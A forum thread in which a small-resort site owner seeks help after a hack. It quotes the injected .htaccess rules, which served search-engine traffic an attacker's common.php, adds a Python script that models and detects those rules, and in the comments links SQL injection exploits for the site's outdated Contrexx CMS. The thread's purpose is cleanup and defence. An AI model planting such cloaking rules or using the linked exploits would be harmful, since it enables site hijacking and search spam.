
Possible Duplicate:
My server’s been hacked EMERGENCY

My website was hacked recently. I think I've found the code that was added to the htaccess file, deleted it and then added a script to prevent the htaccess file being accessed again. I've also deleted the PHP file that the hacked code refers to (common.php). What do I need to do next? I'm not a programmer or website developer, but I really wanted to see if I could fix the problem myself, as I've spent quite a few hours trying and don't give up easily.

Here is the hacked code that I deleted:

<IfModule mod_rewrite.c>
RewriteEngine On
# Only fires for search-engine crawlers or visitors arriving from a search result
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo)
# ...and only for directory requests or page files
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|phtml|asp|aspx)$ [NC]
# ...but not for common.php itself, and only while that dropped file exists
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond /home/httpd/vhosts/bluestardive.com/httpdocs/common.php -f
# Every matching request is served the attacker's common.php instead of the real page
RewriteRule ^.*$    /common.php [L]
</IfModule>

This code has to stay in the htaccess file, as it redirects my URLs to SEO-friendly ones or the website errors, but has this code been hacked as well?

# Apache search queries statistic module
RewriteEngine On
AddHandler php5-fastcgi .php .php5
# <contrexx>
#   <core_modules__alias>
    RewriteRule ^about-us$    /index.php?page=883 [L,NC]
    RewriteRule ^ausfluge-und-aktivitaten$    /index.php?page=800 [L,NC]
    RewriteRule ^bluestardive-news$    /index.php?page=919 [L,NC]
    RewriteRule ^bookings$    /index.php?page=911 [L,NC]
    RewriteRule ^diveresort$    /index.php?page=879 [L,NC]
    RewriteRule ^diving$    /index.php?page=880 [L,NC]
    RewriteRule ^excursions-and-activities$    /index.php?page=881 [L,NC]
    RewriteRule ^galerie$    /index.php?section=gallery [L,NC]
    RewriteRule ^oceannight$    http://www.bluestardive.com/index.php?page=906 [L,NC]
    RewriteRule ^philosophy$    /index.php?page=846 [L,NC]
    RewriteRule ^reservation$    /index.php?page=917 [L,NC]
    RewriteRule ^reservierung$    /index.php?page=918 [L,NC]
    RewriteRule ^resort$    /index.php?page=798 [L,NC]
#   </core_modules__alias>
# </contrexx>
  • ...did you find out how they got in? If not, they'll probably just set up shop again soon. –  Oct 21 '12 at 05:26
  • If you have a dedicated host then you should talk to them to see how and from where the attackers got entry. This has happened to me as well, and my website got flagged as malicious by Google, making it impossible to enter it from searching it on Google. Check out http://www.stopbadware.org/ for tips that might help you cleanse whatever corruption has been made. –  Oct 21 '12 at 05:44
  • I know it was one of two people that did it... We had a manager who was renting the resort until he got bored; he left the other week and left me with loads of issues to sort out. He had server access. The other person was a guest, and this manager aggravated him, so he could have hacked into the site... –  Oct 21 '12 at 05:45
  • Contrexx have reset all the access codes and deleted the manager's access... If it was the guest who was the hacker, will putting code in the htaccess file so that no one can edit it not prevent anyone from hacking the website? –  Oct 21 '12 at 05:47
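To see which visitors the block quoted in the question actually diverted, and to check an htaccess file for the same pattern, here is an added example (not code from the question, the answer, or Contrexx); it models only that block's conditions, approximates REQUEST_FILENAME by the request URI, and treats "bing" as an assumed extra search-engine name in the scanner.

```python
"""Added example (not code from the original post): model the hijacked .htaccess block from
the question to show which visitors it diverts to /common.php, and flag that pattern in an
.htaccess file. Assumes the block as posted; REQUEST_FILENAME is approximated by the URI."""
import re

SEARCH_ENGINES = re.compile(r"(google|yahoo)")  # as posted: no [NC], so case-sensitive
PAGE_EXT = re.compile(r"(shtml|html|htm|php|xml|phtml|asp|aspx)$", re.IGNORECASE)  # has [NC]

def is_cloaked(request_uri, user_agent="", referer="", common_php_exists=True):
    """True when the posted rules rewrite this request to /common.php.

    RewriteCond lines are ANDed unless they carry [OR], so the block reads:
      (UA matches google|yahoo OR Referer matches google|yahoo)
      AND (URI ends in '/' OR target has a page extension)
      AND target is not common.php AND /common.php exists on disk.
    Ordinary visitors fail the first test, so the site owner never sees the injected page.
    """
    from_search = bool(SEARCH_ENGINES.search(user_agent) or SEARCH_ENGINES.search(referer))
    page_like = request_uri.endswith("/") or bool(PAGE_EXT.search(request_uri))
    return from_search and page_like and "common.php" not in request_uri and common_php_exists

# Cloaking signature: a UA/Referer condition naming a search engine ("bing" is an assumed
# extra), followed in the same chain by a catch-all RewriteRule (^.*$).
CLOAK_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_(USER_AGENT|REFERER)\}\s+\S*(google|yahoo|bing)", re.I)
CATCH_ALL = re.compile(r"^\s*RewriteRule\s+\^\.\*\$\s+(\S+)", re.I)

def find_cloaking_rules(htaccess_text):
    """Return (cond_line, rule_line, target) for each catch-all rule guarded by such a condition."""
    hits, pending = [], None
    for n, line in enumerate(htaccess_text.splitlines(), 1):
        if CLOAK_COND.match(line):
            pending = n
        elif line.lstrip().startswith("RewriteRule"):
            m = CATCH_ALL.match(line)
            if pending and m:
                hits.append((pending, n, m.group(1)))
            pending = None  # a RewriteRule ends its condition chain; per-URL alias rules never match
    return hits

# The block quoted in the question, embedded here as sample input.
HIJACKED = """<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|phtml|asp|aspx)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond /home/httpd/vhosts/bluestardive.com/httpdocs/common.php -f
RewriteRule ^.*$    /common.php [L]
</IfModule>"""
```

The per-URL alias rules from the second block produce no hits because each maps a single path; that only shows they lack the cloaking pattern, not that index.php or the database are clean.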

1 Answer


The best thing to do in situations like these is to pinpoint the user's entry point and duplicate the attack - I cannot tell you whether there is anything suspicious added into the .htaccess, as I have no idea what is inside index.php.

If index.php echoes data directly from the database, then it might be possible that he/she added malicious code inside the database; he/she possibly created a few new entry points (PHP shells, vulns) in other files.

I would strongly recommend that you talk to a security professional - if not, thoroughly re-inspect every file on your server, including database entries.

Make sure to figure out what his entry point was as well, to prevent future attacks - if you need any further information you can always contact me.

Pfft
  • Hi Jimmy, the entry date on the htaccess file and the index page were the same; both were dates in the past when the website was fine... I think it's likely the index.php file got hacked... How do I edit PHP files? When I open it up it's just a mishmash of digits. I tried deleting the index.php file but it just crashed the website. –  Oct 21 '12 at 05:51
  • Are you running any CMS - or did you write your website yourself? Also; could you post the index.php here? Is that the only file on your server? –  Oct 21 '12 at 06:00
  • We use the Contrexx CMS and the website was designed by a company... I've been editing the htaccess through FTP. –  Oct 21 '12 at 06:04
  • What version of contrexx are you using? –  Oct 21 '12 at 06:05
  • Contrexx® Web Content Management System Standard Version 2.1 Service Pack 3 - Stable Release date: 23.01.2010 –  Oct 21 '12 at 06:10
  • It's an old version, but they wanted several hundred dollars to upgrade us... it's not economical for a small resort, so I had to leave it. The CMS is probably way too advanced for what we need, but we inherited it. –  Oct 21 '12 at 06:11
  • There are multiple SQL injection vulnerabilities for that system: http://www.exploit-db.com/exploits/17667/ and http://www.exploit-db.com/exploits/17682/; they can be excellent entry points. –  Oct 21 '12 at 06:12
  • There are lots of files on the server, but only a couple had the same dates, which was odd. I've opened the index file in WordPad but it's too big to post. –  Oct 21 '12 at 06:13
  • Are your server logs untouched? Could you post them here? –  Oct 21 '12 at 06:16
  • Are the logs on the server, in the admin, or on the FTP? –  Oct 21 '12 at 06:26
  • I can see FTP statistics on the server. –  Oct 21 '12 at 06:27
  • You need the Apache logs. error.log, access.log, those. –  Oct 21 '12 at 06:30
  • I think you should consider using a different CMS - and delete all the files on the server. Unless you are willing to hire a security professional / or pay for an upgrade of your current CMS. –  Oct 21 '12 at 06:47
  • There is a file called logs but it's empty... Don't worry. Thanks for all your help, I really appreciate it. I should probably get Contrexx to look into this. –  Oct 21 '12 at 06:48